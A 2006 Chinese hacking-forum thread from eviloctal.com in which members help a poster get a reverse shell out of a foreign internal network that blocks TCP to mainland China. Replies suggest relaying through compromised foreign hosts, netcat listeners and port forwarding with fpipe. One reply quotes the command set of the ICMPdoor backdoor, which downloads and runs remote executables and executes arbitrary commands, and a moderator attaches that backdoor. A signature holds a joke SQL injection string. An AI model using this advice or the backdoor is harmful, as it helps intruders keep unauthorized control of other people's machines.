‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[讨论]内网反弹问题探讨

nowthk

晶莹剔透§烈日灼然

Rank: 1

帖子
104 
精华
4 
积分
510 
阅读权限
50 
在线时间
124 小时 
注册时间
2005-3-14 
最后登录
2007-4-12 
楼主 发表于 2006-5-11 02:19  只看该作者

[讨论]内网反弹问题探讨

议题作者:nowthk
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

内部网络,可以ping出www.163.com的ip地址,说明dns还没有设置错,初步分析得出可以上网。

但反弹的时候,一直连接不上自己监听的端口。

而且又如下进行测试,写了一个工具是专门探测连接某ip的端口是否存在,仍然拿www.163.com的ip测试,直接连接此163网易IP的80端口,显示关闭。说明连网易的80端口都不可以连接(但可以ping出IP)

再次分析,可能把大陆的端口封掉,因为netstat -an,里有连接他们国家的80和443(https)端口,说明上网是没有问题的.

最后分析,可能是因为路由禁止了大陆的tcp通信,udp和icmp包还不确定.

现在,我的目的只是反弹,各位有什么好的建议,突破一下,我相信大家玩得多了,估计把人家的网络也“逼”成这样子了吧。。呵呵,突破这点对我们来说也是一种突破呵。
\';update heart set love=\'nothing
\' where name=yaner;--

TOP

goodopell

晶莹剔透§烈日灼然

Rank: 1

帖子
29 
精华
0 
积分
75 
阅读权限
40 
在线时间
57 小时 
注册时间
2005-1-22 
最后登录
2008-12-15 
沙发 发表于 2006-5-11 07:31  只看该作者
找个国外肉鸡弹过去就完了

TOP

nowthk

晶莹剔透§烈日灼然

Rank: 1

帖子
104 
精华
4 
积分
510 
阅读权限
50 
在线时间
124 小时 
注册时间
2005-3-14 
最后登录
2007-4-12 
椅子 发表于 2006-5-11 08:46  只看该作者
引用:
这里是引用第[1 楼]goodopell2006-05-11 07:31发表的:
找个国外肉鸡弹过去就完了
要找个就不要这么多费话了,这不是解决办法,换个换个。
\';update heart set love=\'nothing
\' where name=yaner;--

TOP

逝水

晶莹剔透§烈日灼然

Rank: 1

帖子
36 
精华
2 
积分
138 
阅读权限
40 
在线时间
40 小时 
注册时间
2006-4-13 
最后登录
2008-4-14 
板凳 发表于 2006-5-11 13:53  只看该作者
他的网络对大陆的通信做了限制,但是你可以访问到他的网络,那就用NC在他的机器上本地监听,你去连一下吧,连不上的就用端口转发或是复用吧。 [s:37] 不知道有没有效果呢 [s:75]

TOP

风蓝

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
181 
精华
12 
积分
3615 
阅读权限
100 
性别
男 
在线时间
327 小时 
注册时间
2005-4-12 
最后登录
2007-11-17 
地板 发表于 2006-5-11 14:07  只看该作者
可以ping通不代表可以访问外网...


看看他的dns是什么IP,再看看他的网关IP,也许他只是可以访问dns的IP而已..
我的Blog:http://www.tantao.cn

TOP

nowthk

晶莹剔透§烈日灼然

Rank: 1

帖子
104 
精华
4 
积分
510 
阅读权限
50 
在线时间
124 小时 
注册时间
2005-3-14 
最后登录
2007-4-12 
6楼 发表于 2006-5-11 22:08  只看该作者
引用:
这里是引用第[4 楼]风蓝2006-05-11 14:07发表的:
可以ping通不代表可以访问外网...


看看他的dns是什么IP,再看看他的网关IP,也许他只是可以访问dns的IP而已..
请问,你是怎么判断某机器可以上网的.
\';update heart set love=\'nothing
\' where name=yaner;--

TOP

nowthk

晶莹剔透§烈日灼然

Rank: 1

帖子
104 
精华
4 
积分
510 
阅读权限
50 
在线时间
124 小时 
注册时间
2005-3-14 
最后登录
2007-4-12 
7楼 发表于 2006-5-11 22:11  只看该作者
引用:
这里是引用第[3 楼]逝水2006-05-11 13:53发表的:
他的网络对大陆的通信做了限制,但是你可以访问到他的网络,那就用NC在他的机器上本地监听,你去连一下吧,连不上的就用端口转发或是复用吧。 [s:37] 不知道有没有效果呢 [s:75]
大哥可能这方面玩得少,在本地自己的端口转发,你能保证把你监听的端口从路由映射出来吗?呵呵,需要路由吧。。那干脆再进行一个路由入侵了。。
\';update heart set love=\'nothing
\' where name=yaner;--

TOP

逝水

晶莹剔透§烈日灼然

Rank: 1

帖子
36 
精华
2 
积分
138 
阅读权限
40 
在线时间
40 小时 
注册时间
2006-4-13 
最后登录
2008-4-14 
8楼 发表于 2006-5-11 23:33  只看该作者
引用:
这里是引用第[6 楼]nowthk2006-05-11 22:11发表的:


大哥可能这方面玩得少,在本地自己的端口转发,你能保证把你监听的端口从路由映射出来吗?呵呵,需要路由吧。。那干脆再进行一个路由入侵了。。
呵呵。你没理解我的意思,转发的端口当然是你能访问到的那些了,在他服务器上监听的端口当然是访问不了的 。我说的转发是把他监听的端口转发成他外网能访问的那个端口。

TOP

nowthk

晶莹剔透§烈日灼然

Rank: 1

帖子
104 
精华
4 
积分
510 
阅读权限
50 
在线时间
124 小时 
注册时间
2005-3-14 
最后登录
2007-4-12 
9楼 发表于 2006-5-12 00:12  只看该作者
引用:
这里是引用第[7 楼]逝水2006-05-11 23:33发表的:Re:[讨论]Look~~内网反弹问题


呵呵。你没理解我的意思,转发的端口当然是你能访问到的那些了,在他服务器上监听的端口当然是访问不了的 。我说的转发是把他监听的端口转发成他外网能访问的那个端口。
嗯,呵呵,现在我的目的要的就是这个,这不是我提问的问题嘛。:)
\';update heart set love=\'nothing
\' where name=yaner;--

TOP

nowthk

晶莹剔透§烈日灼然

Rank: 1

帖子
104 
精华
4 
积分
510 
阅读权限
50 
在线时间
124 小时 
注册时间
2005-3-14 
最后登录
2007-4-12 
10楼 发表于 2006-5-12 00:14  只看该作者
我记得有一种后门,用叫ICMPdoor,,这种东西。。。我还没有找到,而且我不清楚,是不是可以用icmp通信来转发端口  [s:73]
\';update heart set love=\'nothing
\' where name=yaner;--

TOP

逝水

晶莹剔透§烈日灼然

Rank: 1

帖子
36 
精华
2 
积分
138 
阅读权限
40 
在线时间
40 小时 
注册时间
2006-4-13 
最后登录
2008-4-14 
11楼 发表于 2006-5-12 13:51  只看该作者
引用:
这里是引用第[9 楼]nowthk2006-05-12 00:14发表的:
我记得有一种后门,用叫ICMPdoor,,这种东西。。。我还没有找到,而且我不清楚,是不是可以用icmp通信来转发端口  [s:73]
ICMPdoor只是一种以icmp的通信方式的后门。不开端口。没有转发功能。其实用fpipe就可以了。
=============================================================
本后门利用ICMP数据包进行通信,。安装成系统服务,开机自动运行。可以穿透一些防火墙。
icmpsrv.exe :服务端程序,使用 -install(-remove御载)参数安装成服务。
icmpsend.exe :客户端程序。使用icmpsend IP进行控制。
ICMP_Backdoor命令说明:
[http://xxx.xxx.xxx/admin.exe -hacker.exe]
http下载文件,保存在目标主机\\system32\目录下,文件名为hacker.exe(可改)。参数hacker.exe,前面的“-”不能省去
[pslist] 列出远程主机的进程名称和pid
[pskill id] 杀进程号为id的进程
输入普通cmd命令,则远程主机执行相关命令。
=============================================================
http://www.eviloctal.com/forum/read.php?tid=4535工具在这里有下,呵呵。,没注意吧,
[s:37]

TOP

haicao

技术核心组

Rank: 8Rank: 8

E.S.T核心成员 项目主管

帖子
429 
精华
24 
积分
5195 
阅读权限
200 
性别
男 
在线时间
164 小时 
注册时间
2004-10-5 
最后登录
2008-10-27 

软件研发奖 技术活跃奖 原创技术奖

12楼 发表于 2006-5-12 16:30  只看该作者
你找个国外的肉鸡作个端口重定向这样不是可以么?
在我纯真年少時,有一個女生,她願意爲我失去生命,她意志堅定地說:你再纏著我,我就去死! 在我負笈外地時,有一個女生,她願意等我到下輩子,她溫柔婉約地說:你想成爲我男友?等下輩子!! 在我窮困潦倒時,有一個女生,她願意與我共赴黃泉,她眨著紅眼說:你再不還錢,我和你同歸于盡!

TOP

yjd

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
56 
精华
0 
积分
3188 
阅读权限
100 
性别
男 
在线时间
43 小时 
注册时间
2005-2-13 
最后登录
2009-1-4 
13楼 发表于 2006-5-12 19:49  只看该作者
以前就朋到一个国外的站..不知道怎么屏蔽大陆的.不管用http还是其他种类的代理,
2级,3级都没办法访问到他的网站.
自能通过他同一个国家的3389肉鸡才可以访问到他的站. [s:75]

TOP

sunwear

团队执行官

Rank: 8Rank: 8

E.S.T核心成员

帖子
3829 
精华
70 
积分
19632 
阅读权限
200 
性别
男 
来自
天津 
在线时间
1681 小时 
注册时间
2004-8-16 
最后登录
2009-1-9 

优秀管理奖 原创技术奖 核心建议奖 资料收集奖

14楼 发表于 2006-5-13 00:00  只看该作者
看他是从哪一层进行的屏蔽了。
至于icmpdoor 他可不是反弹的

附件

icmpdoor.rar (14 KB)

2006-5-13 00:00, 下载次数: 23

TOP

hack520

运维管理组

Rank: 7Rank: 7Rank: 7Rank: 7

E.S.T论坛版主

帖子
1082 
精华
6 
积分
5594 
阅读权限
150 
性别
男 
在线时间
579 小时 
注册时间
2005-3-18 
最后登录
2008-8-31 
15楼 发表于 2006-5-13 00:50  只看该作者
[s:74] 同意风蓝的,能PING不一定能上网。
Www.China-Mu.Co.Kr 猪毛奇迹 1.02Q 将带给你无比的震撼。
注:此账号密码已更改,请本人与冰血联系修改密码。

TOP

nowthk

晶莹剔透§烈日灼然

Rank: 1

帖子
104 
精华
4 
积分
510 
阅读权限
50 
在线时间
124 小时 
注册时间
2005-3-14 
最后登录
2007-4-12 
16楼 发表于 2006-5-13 03:32  只看该作者
除了找肉鸡呢..?还有别的办法吗?

现在的判断是他的tcp通信,我感觉到只有他的公司的外网,其它的我不太确定。icmp是随便的,udp不确定~~

  [s:92]  [s:92] 不行再试试udp协议了
\';update heart set love=\'nothing
\' where name=yaner;--

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题